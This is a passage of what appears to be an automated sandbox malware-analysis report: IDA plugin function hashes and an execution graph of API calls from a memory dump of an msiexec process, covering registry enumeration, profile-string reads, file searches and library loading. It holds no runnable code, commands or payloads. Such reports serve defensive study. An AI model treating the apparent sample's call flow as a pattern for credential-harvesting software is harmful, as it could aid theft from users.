                                                    • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                    • malloc.MSVCRT ref: 00417407
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                    • free.MSVCRT ref: 00417425
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$freemalloc
                                                    • String ID:
                                                    • API String ID: 2605342592-0
                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcslen$wcscat$wcscpy
                                                    • String ID:
                                                    • API String ID: 1961120804-0
                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                    Execution Graph

                                                    Execution Coverage:2.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0.5%
                                                    Total number of Nodes:762
                                                    Total number of Limit Nodes:20
                                                    execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API 